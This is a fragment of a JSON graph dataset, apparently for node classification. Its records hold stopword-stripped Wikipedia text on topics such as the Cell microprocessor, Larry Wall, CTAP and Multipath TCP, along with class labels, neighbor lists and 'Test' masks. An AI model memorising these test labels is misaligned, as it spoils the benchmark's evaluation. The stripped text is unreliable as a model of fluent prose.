    "text": "Nokia_E73_Mode:nokia e73 mode nokia e73 mode feature phone nokia e series range manufactured nokia company successor nokia e73 nokia e73 mode enterprise-based feature phone nokia eseries devices standard features including mobile email calendar instant messaging among many others like nokia e72",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 6311,
    "label": 3,
    "text": "Cell_(microprocessor):cell microprocessor cell multi-core microprocessor microarchitecture combines general-purpose powerpc core modest performance streamlined coprocessing elements greatly accelerate multimedia vector processing applications well many forms dedicated computation developed sony toshiba ibm alliance known sti architectural design first implementation carried sti design center austin texas four-year period beginning march 2001 budget reported sony approaching us 400 million cell shorthand cell broadband engine architecture commonly abbreviated cbea full cell part first major commercial application cell sony playstation 3 game console mercury computer systems dual cell server dual cell blade configuration rugged computer pci express accelerator board available different stages production toshiba announced plans incorporate cell high definition television sets seems abandoned idea exotic features xdr memory subsystem coherent element interconnect bus eib interconnect appear position cell future applications supercomputing space exploit cell processor prowess floating point kernels cell architecture includes memory coherence architecture emphasizes power efficiency prioritizes bandwidth low latency favors peak computational throughput simplicity program code reasons cell widely regarded challenging environment software development ibm provides linux-based development platform help developers program cell chips architecture widely used unless adopted software development community however cell strengths may make useful scientific computing regardless mainstream success mid-2000 sony computer entertainment toshiba corporation ibm formed alliance known sti design manufacture processor sti design center opened march 2001 cell designed period four years using enhanced versions design tools power4 processor 400 engineers three companies worked together austin critical support eleven ibm design centers period ibm filed many patents pertaining cell architecture manufacturing process software environment early patent version broadband engine shown chip package comprising four processing elements patent description known power processing element ppe processing element contained 8 apus referred spes current broadband engine chip chip package widely regarded run clock speed 4 ghz 32 apus providing 32 gigaflops fp8 quarter precision broadband engine shown 1 teraflops raw computing power design fabricated using 90 nm soi process march 2007 ibm announced 65 nm version cell production plant time globalfoundries east fishkill new york bandai namco entertainment used cell processor 357 arcade board well subsequent 369 february 2008 ibm announced begin fabricate cell processors 45 nm process may 2008 ibm introduced high-performance double-precision floating-point version cell processor powerxcell 8i 65 nm feature size may 2008 opteron- powerxcell 8i-based supercomputer ibm roadrunner system became world first system achieve one petaflops fastest computer world third quarter 2009 world three energy efficient supercomputers represented green500 list similarly based powerxcell 8i 45 nm cell processor introduced concert sony playstation 3 slim august 2009 november 2009 ibm discontinued development cell processor 32 apus still developing cell products may 17 2005 sony computer entertainment confirmed specifications cell processor would shipping then-forthcoming playstation 3 console cell configuration one ppe core eight physical spes silicon playstation 3 one spe locked-out test process practice helps improve manufacturing yields another one reserved os leaving 6 free spes used games code target clock-frequency introduction 3.2 ghz introductory design fabricated using 90 nm soi process initial volume production slated ibm facility east fishkill new york relationship cores threads common source confusion ppe core dual threaded manifests software two independent threads execution active spe manifests single thread playstation 3 configuration described sony cell processor provides nine independent threads execution june 28 2005 ibm mercury computer systems announced partnership agreement build cell-based computer systems embedded applications medical imaging industrial inspection aerospace defense seismic processing telecommunications mercury since released blades conventional rack servers pci express accelerator boards cell processors fall 2006 ibm released qs20 blade module using double cell processors tremendous performance certain applications reaching peak 410 gigaflops fp8 quarter precision per module qs22 based powerxcell 8i processor used ibm roadrunner supercomputer mercury ibm uses fully utilized cell processor eight active spes april 8 2008 fixstars corporation released pci express accelerator board based powerxcell 8i processor sony high performance media computing server zego uses 3.2 ghz cell/b.e processor cell broadband engine cell commonly known microprocessor intended hybrid conventional desktop processors athlon 64 core 2 families specialized high-performance processors nvidia ati graphics-processors gpus longer name indicates intended use namely component current future online distribution systems may utilized high-definition displays recording equipment well hdtv systems additionally processor may suited digital imaging systems medical scientific etc physical simulation e.g scientific structural engineering modeling simple analysis cell processor split four components external input output structures main processor called power processing element ppe two-way simultaneous-multithreaded powerpc 2.02 core eight fully functional co-processors called synergistic processing elements spes specialized high-bandwidth circular data bus connecting ppe input/output elements spes called element interconnect bus eib achieve high performance needed mathematically intensive tasks decoding/encoding mpeg streams generating transforming three-dimensional data undertaking fourier analysis data cell processor marries spes ppe via eib give access via fully cache coherent dma direct memory access main memory external data storage make best eib overlap computation data transfer nine processing elements ppe spes equipped dma engine since spe load/store instructions access local scratchpad memory spe entirely depends dmas transfer data main memory spes local memories dma operation transfer either single block area size 16kb list 2 2048 blocks one major design decisions architecture cell use dmas central means intra-chip data transfer view enabling maximal asynchrony concurrency data processing inside chip ppe capable running conventional operating system control spes start stop interrupt schedule processes running spes end ppe additional instructions relating control spes unlike spes ppe read write main memory local memories spes standard load/store instructions despite turing complete architectures spes fully autonomous require ppe prime useful work horsepower system comes synergistic processing elements use dma method data transfer limited local memory footprint spe pose major challenge software developers wish make horsepower demanding careful hand-tuning programs extract maximal performance cpu ppe bus architecture includes various modes operation giving different levels memory protection allowing areas memory protected access specific processes running spes ppe ppe spe risc architectures fixed-width 32-bit instruction format ppe contains 64-bit general purpose register set gpr 64-bit floating point register set fpr 128-bit altivec register set spe contains 128-bit registers used scalar data types ranging 8-bits 64-bits size simd computations variety integer floating point formats system memory addresses ppe spe expressed 64-bit values theoretic address range 2 bytes 16 exabytes 16,777,216 terabytes practice bits implemented hardware local store addresses internal spu synergistic processor unit processor expressed 32-bit word documentation relating cell word always taken mean 32 bits doubleword means 64 bits quadword means 128 bits 2008 ibm announced revised variant cell called powerxcell 8i available qs22 blade servers ibm powerxcell manufactured 65 nm process adds support 32 gb slotted ddr2 memory well dramatically improving double-precision floating-point performance spes peak 12.8 gflops 102.4 gflops total eight spes coincidentally peak performance nec sx-9 vector processor released around time ibm roadrunner supercomputer world fastest 2008-2009 consisted 12,240 powerxcell 8i processors along 6,562 amd opteron processors powerxcell 8i powered super computers also dominated top 6 greenest systems green500 list highest mflops/watt ratio supercomputers world beside qs22 supercomputers powerxcell processor also available accelerator pci express card used core processor qpace project since powerxcell 8i removed rambus memory interface added significantly larger ddr2 interfaces enhanced spes chip layout reworked resulted larger chip die packaging cell chip number different configurations basic configuration multi-core chip composed one power processor element ppe sometimes called processing element pe multiple synergistic processing elements spe ppe spes linked together internal high speed bus dubbed element interconnect bus eib ppe powerpc based dual-issue in-order two-way simultaneous-multithreaded core 23-stage pipeline acting controller eight spes handle computational workload ppe limited order execution capabilities perform loads order delayed execution pipelines ppe work conventional operating systems due similarity 64-bit powerpc processors spes designed vectorized floating point code execution ppe contains 64 kib level 1 cache 32 kib instruction 32 kib data 512 kib level 2 cache size cache line 128 bytes additionally ibm included altivec vmx unit fully pipelined single precision floating point altivec 1 support double precision floating-point vectors 32-bit fixed point unit fxu 64-bit register file per thread load store unit lsu 64-bit floating-point unit fpu branch unit bru branch execution unit bxu ppe consists three main units instruction unit iu execution unit xu vector/scalar execution unit vsu iu contains l1 instruction cache branch prediction hardware instruction buffers dependency checking login xu contains integer execution units fxu load-store unit lsu vsu contains execution resources fpu vmx ppe complete two double precision operations per clock cycle using scalar fused-multiply-add instruction translates 6.4 gflops 3.2 ghz eight single precision operations per clock cycle vector fused-multiply-add instruction translates 25.6 gflops 3.2 ghz ppe designed specifically cell processor development microsoft approached ibm wanting high performance processor core xbox 360 ibm complied made tri-core xenon processor based slightly modified version ppe added vmx128 extensions spe dual issue order processor composed synergistic processing unit spu memory flow controller mfc dma mmu bus interface spes n't branch prediction hardware hence heavy burden compiler spe 6 execution units divided among odd even pipelines spe spu runs specially developed instruction set isa 128-bit simd organization single double precision instructions current generation cell spe contains 256 kib embedded sram instruction data called local storage mistaken local memory sony documents refer vram visible ppe addressed directly software spe support 4 gib local store memory local store operate like conventional cpu cache since neither transparent software contain hardware structures predict data load spes contain 128-bit 128-entry register file measures 14.5 mm 90 nm process spe operate sixteen 8-bit integers eight 16-bit integers four 32-bit integers four single-precision floating-point numbers single clock cycle well memory operation note spu directly access system memory 64-bit virtual memory addresses formed spu must passed spu spe memory flow controller mfc set dma operation within system address space one typical usage scenario system load spes small programs similar threads chaining spes together handle step complex operation instance set-top box might load programs reading dvd video audio decoding display data would passed spe spe finally ending tv another possibility partition input data set several spes performing kind operation parallel 3.2 ghz spe gives theoretical 25.6 gflops single precision performance compared personal computer contemporaries relatively high overall floating point performance cell processor seemingly dwarfs abilities simd unit cpus like pentium 4 athlon 64 however comparing floating point abilities system one-dimensional application-specific metric unlike cell processor desktop cpus suited general purpose software usually run personal computers addition executing multiple instructions per clock processors intel amd feature branch predictors cell designed compensate compiler assistance prepare-to-branch instructions created double-precision floating point operations sometimes used personal computers often used scientific computing cell performance drops order magnitude still reaches 20.8 gflops 1.8 gflops per spe 6.4 gflops per ppe powerxcell 8i variant specifically designed double-precision reaches 102.4 gflops double-precision calculations tests ibm show spes reach 98 theoretical peak performance running optimized parallel matrix multiplication toshiba developed co-processor powered four spes ppe called spursengine designed accelerate 3d movie effects consumer electronics spe local memory 256 kb total spes 2 mb local memory eib communication bus internal cell processor connects various on-chip system elements ppe processor memory controller mic eight spe coprocessors two off-chip i/o interfaces total 12 participants ps3 number spu vary industrial applications eib also includes arbitration unit functions set traffic lights documents ibm refers eib participants 'units eib presently implemented circular ring consisting four 16 bytes wide unidirectional channels counter-rotate pairs traffic patterns permit channel convey three transactions concurrently eib runs half system clock rate effective channel rate 16 bytes every two system clocks maximum concurrency three active transactions four rings peak instantaneous eib bandwidth 96 bytes per clock 12 concurrent transactions 16 bytes wide 2 system clocks per transfer figure often quoted ibm literature unrealistic simply scale number processor clock speed arbitration unit imposes additional constraints discussed bandwidth assessment section ibm senior engineer david krolak eib lead designer explains concurrency model participant eib one 16 byte read port one 16 byte write port limit single participant read write rate 16 byte per eib clock simplicity often regarded 8 byte per system clock note spu processor contains dedicated dma management queue capable scheduling long sequences transactions various endpoints without interfering spu ongoing computations dma queues managed locally remotely well providing additional flexibility control model data flows eib channel stepwise around ring since twelve participants total number steps around channel back point origin twelve six steps longest distance pair participants eib channel permitted convey data requiring six steps data must take shorter route around circle direction number steps involved sending packet little impact transfer latency clock speed driving steps fast relative considerations however longer communication distances detrimental overall performance eib reduce available concurrency despite ibm original desire implement eib powerful cross-bar circular configuration adopted spare resources rarely represents limiting factor performance cell chip whole worst case programmer must take extra care schedule communication patterns eib able function high concurrency levels david krolak explained 3.2 ghz channel flows rate 25.6 gb/s viewing eib isolation system elements connects achieving twelve concurrent transactions flow rate works abstract eib bandwidth 307.2 gb/s based view many ibm publications depict available eib bandwidth greater 300 gb/s number reflects peak instantaneous eib bandwidth scaled processor frequency however technical restrictions involved arbitration mechanism packets accepted onto bus ibm systems performance group explained quote apparently represents full extent ibm public disclosure mechanism impact eib arbitration unit snooping mechanism interrupt generation segment page translation faults well described documentation set yet made public ibm practice effective eib bandwidth also limited ring participants involved nine processing cores sustain 25.6 gb/s read write concurrently memory interface controller mic tied pair xdr memory channels permitting maximum flow 25.6 gb/s reads writes combined two io controllers documented supporting peak combined input speed 25.6 gb/s peak combined output speed 35 gb/s add confusion older publications cite eib bandwidth assuming 4 ghz system clock reference frame results instantaneous eib bandwidth figure 384 gb/s arbitration-limited bandwidth figure 256 gb/s things considered theoretic 204.8 gb/s number often cited best one bear mind ibm systems performance group demonstrated spu-centric data flows achieving 197 gb/s cell processor running 3.2 ghz number fair reflection practice well cell contains dual channel rambus xio macro interfaces rambus xdr memory memory interface controller mic separate xio macro designed ibm xio-xdr link runs 3.2 gbit/s per pin two 32-bit channels provide theoretical maximum 25.6 gb/s i/o interface also rambus design known flexio flexio interface organized 12 lanes lane unidirectional 8-bit wide point-to-point path five 8-bit wide point-to-point paths inbound lanes cell remaining seven outbound provides theoretical peak bandwidth 62.4 gb/s 36.4 gb/s outbound 26 gb/s inbound 2.6 ghz flexio interface clocked independently typ 3.2 ghz 4 inbound 4 outbound lanes supporting memory coherency companies leadtek released pci-e cards based upon cell allow faster real time transcoding h.264 mpeg-2 mpeg-4 video august 29 2007 ibm announced bladecenter qs21 generating measured 1.05 giga–floating point operations per second gigaflops per watt peak performance approximately 460 gflops one power efficient computing platforms date single bladecenter chassis achieve 6.4 tera–floating point operations per second teraflops 25.8 teraflops standard 42u rack may 13 2008 ibm announced bladecenter qs22 qs22 introduces powerxcell 8i processor five times double-precision floating point performance qs21 capacity 32 gb ddr2 memory on-blade ibm discontinued blade server line based cell processors january 12 2012 several companies provide pci-e boards utilising ibm powerxcell 8i performance reported 179.2 gflops sp 89.6 gflops dp 2.8 ghz sony playstation 3 video game console first production application cell processor clocked 3.2 ghz containing seven eight operational spes allow sony increase yield processor manufacture six seven spes accessible developers one reserved os toshiba produced hdtvs using cell presented system decode 48 standard definition mpeg-2 streams simultaneously 1920×1080 screen enable viewer choose channel based dozens thumbnail videos displayed simultaneously screen ibm supercomputer ibm roadrunner hybrid general purpose x86-64 opteron well cell processors system assumed 1 spot june 2008 top 500 list first supercomputer run petaflops speeds gained sustained 1.026 petaflops speed using standard linpack benchmark ibm roadrunner used powerxcell 8i version cell processor manufactured using 65 nm technology enhanced spus handle double precision calculations 128-bit registers reaching double precision 102 gflops per chip clusters playstation 3 consoles attractive alternative high-end systems based cell blades innovative computing laboratory group led jack dongarra computer science department university tennessee investigated application depth terrasoft solutions selling 8-node 32-node ps3 clusters yellow dog linux pre-installed implementation dongarra research first reported wired october 17 2007 interesting application using playstation 3 cluster configuration implemented astrophysicist gaurav khanna physics department university massachusetts dartmouth replaced time used supercomputers cluster eight playstation 3s subsequently next generation machine called playstation 3 gravity grid uses network 16 machines exploits cell processor intended application binary black hole coalescence using perturbation theory particular cluster performs astrophysical simulations large supermassive black holes capturing smaller compact objects generated numerical data published multiple times relevant scientific research literature cell processor version used playstation 3 main cpu 6 spes available user giving gravity grid machine net 16 general-purpose processors 96 vector processors machine one-time cost 9,000 build adequate black-hole simulations would otherwise cost 6,000 per run conventional supercomputer black hole calculations memory-intensive highly localizable well-suited architecture khanna claims cluster performance exceeds 100+ intel xeon core based traditional linux cluster simulations ps3 gravity grid gathered significant media attention 2007 2008 2009 2010 computational biochemistry biophysics lab universitat pompeu fabra barcelona deployed 2007 boinc system called ps3grid collaborative computing based cellmd software first one designed specifically cell processor united states air force research laboratory deployed playstation 3 cluster 1700 units nicknamed condor cluster analyzing high-resolution satellite imagery air force claims condor cluster would 33rd largest supercomputer world terms capacity lab opened supercomputer use universities research help computing power half million playstation 3 consoles distributed computing project folding home recognized guinness world records powerful distributed network world first record achieved september 16 2007 project surpassed one petaflops never previously attained distributed computing network additionally collective efforts enabled ps3 alone reach petaflops mark september 23 2007 comparison world second-most powerful supercomputer time ibm bluegene/l performed around 478.2 teraflops means folding home computing power approximately twice bluegene/l although cpu interconnect bluegene/l one million times faster mean network speed folding home may 7 2011 folding home runs 9.3 x86 petaflops 1.6 petaflops generated 26,000 active ps3s alone late 2008 cluster 200 playstation 3 consoles used generate rogue ssl certificate effectively cracking encryption ibm announced april 25 2007 would begin integrating cell broadband engine architecture microprocessors company line mainframes led gameframe architecture processor makes better suited hardware-assisted cryptographic brute force attack applications conventional processors due flexible nature cell several possibilities utilization resources limited different computing paradigms ppe maintains job queue schedules jobs spes monitors progress spe runs mini kernel whose role fetch job execute synchronize ppe kernel scheduling distributed across spes tasks synchronized using mutexes semaphores conventional operating system ready-to-run tasks wait queue spe execute spes use shared memory tasks configuration spe runs distinct program data comes input stream sent spes spe terminated processing output data sent output stream provides flexible powerful architecture stream processing allows explicit scheduling spe separately processors also able perform streaming tasks limited kernel loaded 2005 patches enabling cell support linux kernel submitted inclusion ibm developers arnd bergmann one developers aforementioned patches also described linux-based cell architecture linuxtag 2005 release 2.6.16 march 20 2006 linux kernel officially supports cell processor ppe spes programmable c/c++ using common api provided libraries fixstars solutions provides yellow dog linux ibm mercury cell-based systems well playstation 3 terra soft strategically partnered mercury provide linux board support package cell support development software applications various cell platforms including ibm bladecenter js21 cell qs20 mercury cell-based solutions terra soft also maintains y-hpc high performance computing cluster construction management suite y-bio gene sequencing tools y-bio built upon rpm linux standard package management offers tools help bioinformatics researchers conduct work greater efficiency ibm developed pseudo-filesystem linux coined spufs simplifies access use spe resources ibm currently maintaining linux kernel gdb ports sony maintains gnu toolchain gcc binutils november 2005 ibm released cell broadband engine cbe software development kit version 1.0 consisting simulator assorted tools web site development versions latest kernel tools fedora core 4 maintained barcelona supercomputing center website august 2007 mercury computer systems released software development kit playstation r 3 high-performance computing november 2007 fixstars corporation released new cvcell module aiming accelerate several important opencv apis cell series software calculation tests recorded execution times 3.2 ghz cell processor 6x 27x faster compared software 2.4 ghz intel core 2 duo illustrations different generations cell/b.e processors powerxcell 8i images scale cell/b.e packages measures 42.5×42.5 mm powerxcell 8i measures 47.5×47.5 mm",
    "neighbors": [
      3077,
      10757,
      6663,
      10761,
      5642,
      1548,
      6157,
      4630,
      1563,
      8231,
      4144,
      7218,
      1587,
      5172,
      6715,
      7234,
      1091,
      3142,
      6732,
      10316,
      6738,
      9302,
      8792,
      1115,
      3677,
      607,
      1635,
      10851,
      3175,
      3185,
      5746,
      5235,
      4211,
      630,
      7801,
      6268,
      6781,
      8316,
      10368,
      643,
      4743,
      6799,
      5269,
      9371,
      1181,
      8861,
      4255,
      6311,
      682,
      684,
      4269,
      10413,
      9391,
      2224,
      5297,
      4276,
      9397,
      3771,
      1725,
      6850,
      3793,
      6873,
      10971,
      6878,
      8931,
      9445,
      8937,
      10985,
      9964,
      9455,
      1776,
      3824,
      8944,
      757,
      2293,
      8438,
      1784,
      249,
      3323,
      8700,
      6909,
      9472,
      6914,
      8450,
      4868,
      10501,
      1798,
      3846,
      6415,
      4881,
      1298,
      5914,
      1309,
      9508,
      6949,
      9512,
      1321,
      7983,
      10543,
      306,
      823,
      10040,
      9020,
      3911,
      9543,
      5450,
      336,
      8530,
      342,
      859,
      11613,
      869,
      359,
      8551,
      8048,
      4465,
      6004,
      7028,
      1399,
      3960,
      8058,
      3451,
      3966,
      9091,
      9095,
      11657,
      1933,
      5006,
      3472,
      8594,
      7065,
      9633,
      10658,
      4516,
      3493,
      8102,
      9126,
      9132,
      8624,
      4017,
      10675,
      1461,
      1462,
      6072,
      8120,
      1983,
      1985,
      6084,
      10180,
      3014,
      6607,
      3025,
      3540,
      2517,
      4060,
      10214,
      4587,
      10734,
      2039,
      508,
      10749
    ],
    "mask": "Test"
  },
  {
    "node_id": 6312,
    "label": 4,
    "text": "National_Cyber_Security_Policy_2013:national cyber security policy 2013 national cyber security policy policy framework department electronics information technology deity ref name= http //meity.gov.in/content/national-cyber-security-policy-2013-1 /ref aims protecting public private infrastructure cyber attacks policy also intends safeguard information personal information web users financial banking information sovereign data particularly relevant wake us national security agency nsa leaks suggested us government agencies spying indian users legal technical safeguards ministry communications information technology india defines cyberspace complex environment consisting interactions people software services supported worldwide distribution information communication technology india cyber security policy 2013 2013 hindu newspaper citing documents leaked nsa whistleblower edward snowden alleged much nsa surveillance focused india domestic politics strategic commercial interests sparked furor among people pressure government unveiled national cyber security policy 2013 2 july 2013 build secure resilient cyberspace citizens business government also protect anyone intervening privacy protect information information infrastructure cyberspace build capabilities prevent respond cyber threat reduce vulnerabilities minimize damage cyber incidents combination institutional structures people processes technology cooperation ministry communications information technology india define objectives follows -to improve visibility integrity ict products services establishing infrastructure testing validation security product",
    "neighbors": [
      9688,
      7887,
      2558,
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 6313,
    "label": 9,
    "text": "Larry_Wall:larry wall larry wall born september 27 1954 american computer programmer author created perl programming language wall grew los angeles bremerton washington starting higher education seattle pacific university 1976 majoring chemistry music later pre-medicine hiatus several years working university computing center graduating bachelor degree natural artificial languages graduate school university california berkeley wall wife studying linguistics intention finding unwritten language perhaps africa creating writing system would use new writing system translate various texts language among bible due health reasons plans cancelled remained united states wall instead joined nasa jet propulsion laboratory finished graduate school wall active member church nazarene wall author codice_1 usenet client widely used codice_2 program international obfuscated c code contest twice recipient first free software foundation award advancement free software 1998 beyond technical skills wall reputation wit often sarcastic sense humour ref name='www.perl.com/pub/a/1999/03/pm.ht /ref displays comments source code usenet example agree necessity compromise ca n't agree necessary compromise wall developed perl interpreter language working system development corporation later became part unisys co-author programming perl often referred camel book published o'reilly definitive resource perl programmers edited perl cookbook became employed full-time o'reilly media develop perl write books subject wall training linguist apparent books interviews lectures often compares perl natural language explains decisions perl design linguistic rationale also often uses linguistic terms perl language constructs instead traditional terms variable function accessor sometimes says noun verb topicalizer wall christian faith influenced terminology perl name biblical reference pearl great price matthew 13:46 similar references function name bless organization perl 6 design documents categories apocalypse exegesis wall also alluded faith spoken conferences including rather straightforward statement beliefs august 1997 perl conference discussion pilgrim progress yapc yet another perl conference june 2000 wall continues oversee development perl serves benevolent dictator life perl project official perl documentation states",
    "neighbors": [
      5249,
      4483,
      5253,
      8582,
      6160,
      10387,
      3988,
      3350,
      10276,
      1837,
      4398,
      9780,
      9014,
      1591,
      6335,
      4294,
      8262,
      7764,
      11610,
      7518,
      11492,
      2281,
      8301,
      8941,
      11632,
      1394,
      8057,
      3837
    ],
    "mask": "None"
  },
  {
    "node_id": 6314,
    "label": 2,
    "text": "Interleaved_memory:interleaved memory computing interleaved memory design made compensate relatively slow speed dynamic random-access memory dram core memory spreading memory addresses evenly across memory banks way contiguous memory reads writes using memory bank turn resulting higher memory throughputs due reduced waiting memory banks become ready desired operations different multi-channel memory architectures primarily interleaved memory adding channels main memory memory controller however channel interleaving also possible example freescale i.mx6 processors allow interleaving done two channels interleaved memory memory addresses allocated memory bank turn example interleaved system two memory banks assuming word-addressable memory logical address 32 belongs bank 0 logical address 33 would belong bank 1 logical address 34 would belong bank 0 interleaved memory said n-way interleaved banks memory location resides bank interleaved memory results contiguous reads common multimedia execution programs contiguous writes used frequently filling storage communication buffers actually using memory bank turn instead using one repeatedly results significantly higher memory throughput bank minimum waiting time reads writes main memory random-access memory ram usually composed collection dram memory chips number chips grouped together form memory bank possible memory controller supports interleaving lay memory banks memory banks interleaved traditional flat layouts memory banks allocated continuous block memory addresses simple memory controller gives equal performance completely random access scenarios compared performance levels achieved interleaving however reality memory reads rarely random due locality reference optimizing close together access gives far better performance interleaved layouts note way memory addressed effect access time memory locations already cached impact memory locations need retrieved dram early research interleaved memory performed ibm 60s 70s relation ibm 7030 stretch computer development went decades improving design flexibility performance produce modern implementations",
    "neighbors": [
      9952,
      2625,
      10945,
      2791,
      10734,
      2383,
      10365,
      8222
    ],
    "mask": "Test"
  },
  {
    "node_id": 6315,
    "label": 2,
    "text": "Netgear_WGR614L:netgear wgr614l wgr614l also known wgr614v8 802.11b/g wireless network router created netgear officially launched june 30 2008 wgr614l runs open source linux firmware supports installation third party packages dd-wrt tomato openwrt wgr614l designed used home business environments often used connection third-party firmware solutions sputniknet titan hotspots router also used wireless client bridge utilizing openwrt firmware wireless repeater bridge using dd-wrt firmware",
    "neighbors": [
      2945,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6316,
    "label": 4,
    "text": "Client_to_Authenticator_Protocol:client authenticator protocol client authenticator protocol ctap enables roaming user-controlled cryptographic authenticator smartphone hardware security key interoperate client platform laptop computer ctap complementary web authentication webauthn standard published world wide web consortium w3c webauthn ctap primary outputs fido2 project joint effort fido alliance w3c ctap based upon previous work done fido alliance particular universal 2nd factor u2f authentication standard specifically fido u2f 1.2 proposed standard july 11 2017 became starting point ctap proposed standard latest version published january 30 2019 ctap specification refers two protocol versions ctap1/u2f protocol ctap2 protocol authenticator implements ctap2 called fido2 authenticator also called webauthn authenticator authenticator implements ctap1/u2f well backward compatible u2f protocol uses cbor binary data serialization format",
    "neighbors": [
      10566,
      3271,
      7212,
      10801,
      1054,
      124,
      5918
    ],
    "mask": "Test"
  },
  {
    "node_id": 6317,
    "label": 3,
    "text": "North_&_South_(video_game):north amp south video game north south combined strategy action game released 1989 commodore amiga atari st ported later nes amstrad cpc msx dos zx spectrum developed published infogrames north south offshoot belgian comic series les tuniques bleues raoul cauvin louis salverius/willy lambillotte dupuis based american civil war player basically acts civil war choosing play either north south player may choose start game year 1861 year civil war erupted 1864 year different array armies states side starts north south contains lot humorous elements example features parodies national anthems accessible player selects one different languages supported game english french spanish german italian addition game filled numerous comical situations gags taking simplified board interface game features strategic map united states separated states territories army units moved around state owns railway station fort capture leads player overtaking whole state otherwise capturing state involves simple movement unless another army state armies reinforced two ways turning option main menu player controlling state north carolina get periodic reinforcements ship also railways generate money turn generates soldiers moving army units player may expand westwards unoccupied territory two antagonistic armies clash result battle option main menu player turn in-game missions battles make purely like board game whenever opposing armies meet board-game mode results battles left chance outcome weighted towards larger army either army may retreat battles whenever side attempts capture enemy fort rob train result also randomised battle screen one action elements game different strategic map player starts opposite sides screen controls army consisting infantry cavalry artillery standard army consists six infantry three cavalry one cannon armies increased three times standard size merging together team six infantry three cavalry three cannons battlefield one time human player control one class units one time although cavalry starts charge left moving automatically forward straight line player focuses either cannon infantry computer-controlled opponent move three classes units infantry cavalry aggressive units class move fire simultaneously infantry move direction including backwards short-range weapon cavalry melee units much faster infantry move backwards cavalry instead return battle field every time reach end seconds cavalry returns way stop moving returning start position left-right axis unhindered movement up-down axis note cavalry movement started stop moving forwards unless player actively pulls horse reigns pushing backwards control method choice cannons move vertically sideways cannon fired nine times battle automatically withdraw battle army wins cannons withdrawn battle cannons available next battle however rest army killed cannons withdrawn cannons also lost middle battle map may river chasm case bridge serves choke point fighters likely meet bridge destroyed cannons one hit leave hole bridge units fall die instantly two hits bridge destroy every battlefield either river canyon narrow indestructible passage across cannons long-range weapons aiming – rather determining exact range – always easy care taken firing cannons avoid friendly fire battle usually deathmatch although player may retreat attacking army retreats return state beginning turn defending army decides retreat move adjacent state still control surrendering state battle enemy defenders retreat adjacent states retreating result loss cannons army army computer-controlled opponent retreat cannons destroyed enemy three times units states train station player must short side-scrolling mission fort capture state player controls single soldier runs towards goal clock reaches end meeting obstacles enemy soldiers dynamite crates dogs help knives punches send enemies towards sky asterix style occasions player also gets opportunity capture enemy train similar manner attacker running along train long see leave successfully capturing enemy train gets gold option turned storm cloud sit one state turn cloud move adjacent state twice month player turn army state cloud able move turn option main menu turned two non-player sides pose threat player armies native american lives west territory might hurl giant tomahawk randomly one westernmost states destroying army unfortunate enough garrisoned similarly sombrero-clad mexican living southwest might suddenly wake siesta toss bomb texas result option turned side controls north carolina chance turn free reinforcements arrive state via ship computer gaming world gave north south one-plus stars five wargamers three five arcade gamers 2011 wirtualna polska ranked tenth best amiga game june 2012 microïds anuman interactive ’ adventure game label released bluecoats north vs south remake ios android compatible devices windows ios version received metascore 60 metacritic another remake titled north south game released ios november 6 2012 bitcomposer entertainment ag",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6318,
    "label": 5,
    "text": "Multipath_TCP:multipath tcp multipath tcp mptcp ongoing effort internet engineering task force ietf multipath tcp working group aims allowing transmission control protocol tcp connection use multiple paths maximize resource usage increase redundancy january 2013 ietf published multipath specification experimental standard rfc 6824 currently ietf works update version 1 mptcp protocol obsolete rfc 6824 approved 2019 redundancy offered multipath tcp enables inverse multiplexing resources thus increases tcp throughput sum available link-level channels instead using single one required plain tcp multipath tcp backward compatible plain tcp multipath tcp particularly useful context wireless networks using wi-fi mobile network typical use case addition gains throughput inverse multiplexing links may added dropped user moves coverage without disrupting end-to-end tcp connection problem link handover thus solved abstraction transport layer without special mechanisms network link level handover functionality implemented endpoints without requiring special functionality subnetworks accordance internet end-to-end principle multipath tcp also brings performance benefits datacenter environments contrast ethernet channel bonding using 802.3ad link aggregation multipath tcp balance single tcp connection across multiple interfaces reach high throughput order facilitate deployment multipath tcp presents socket interface tcp implies standard tcp application used multipath tcp fact spreading data across several subflows applications could benefit enhanced api control underlying multipath tcp stack two different apis proposed expose features multipath tcp stack applications api extends netlink linux enhanced socket api july 2013 mptcp working group reported five independent implementations multipath tcp including reference implementation linux kernel currently available implementations july 2014 oracle reported implementation solaris developed june 2015 work progress mptcp wg meeting ietf 93 sunghoon seo announced kt deployed since mid june commercial service allows smartphone users reach 1 gbit/s using mptcp proxy service multipath tcp designed backward compatible regular tcp support application however specific deployments leverage ability simultaneously using different paths apple uses multipath tcp support siri application iphone siri sends voice samples https session apple servers servers reply information requested users according apple engineers main benefits multipath tcp application deployment use multipath tcp aggregate bandwidth different networks example several types smartphones notably korea use multipath tcp bond wifi 4g socks proxies another example hybrid access networks deployed network operators willing combine xdsl lte networks deployment multipath tcp used efficiently balance traffic xdsl lte network multipath tcp uses options described detail rfc 6824 multipath tcp options encoded tcp options option kind 30 reserved iana multipath tcp option kind 30 length variable remainder content begins 4-bit subtype field iana created maintain sub-registry entitled mptcp option subtypes transmission control protocol tcp parameters registry subtype fields defined follows values 0x8 0xe currently unassigned core idea multipath tcp define way build connection two hosts two interfaces standard tcp instance alice smartphone 3g wifi interfaces ip addresses 10.11.12.13 10.11.12.14 bob computer ethernet interface ip address 20.21.22.23 standard tcp connection established two ip addresses tcp connection identified four-tuple source destination addresses ports given restriction application create one tcp connection single link multipath tcp allows connection use several paths simultaneously multipath tcp creates one tcp connection called subflow path needs used purpose different protocol operations defined rfc 6824 multipath tcp adds new mechanisms tcp transmissions detailed specification detailed protocol specification provided rfc 6824 several survey articles provide introduction protocol several congestion control mechanisms defined multipath tcp main difference classical tcp congestion control schemes need react congestion different paths without unfair single path tcp sources could compete one paths four multipath tcp congestion control schemes currently supported multipath tcp implementation linux kernel stream control transmission protocol 